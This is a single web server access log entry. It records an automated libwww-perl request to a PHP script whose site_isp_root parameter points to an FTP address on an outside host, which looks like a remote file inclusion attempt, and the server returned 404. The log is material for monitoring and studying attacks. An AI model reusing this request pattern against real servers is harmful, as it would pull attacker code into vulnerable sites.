81.255.121.113 - - [17/Apr/2008:16:10:33 -0700] "GET /logs//popup_window.php?site_isp_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
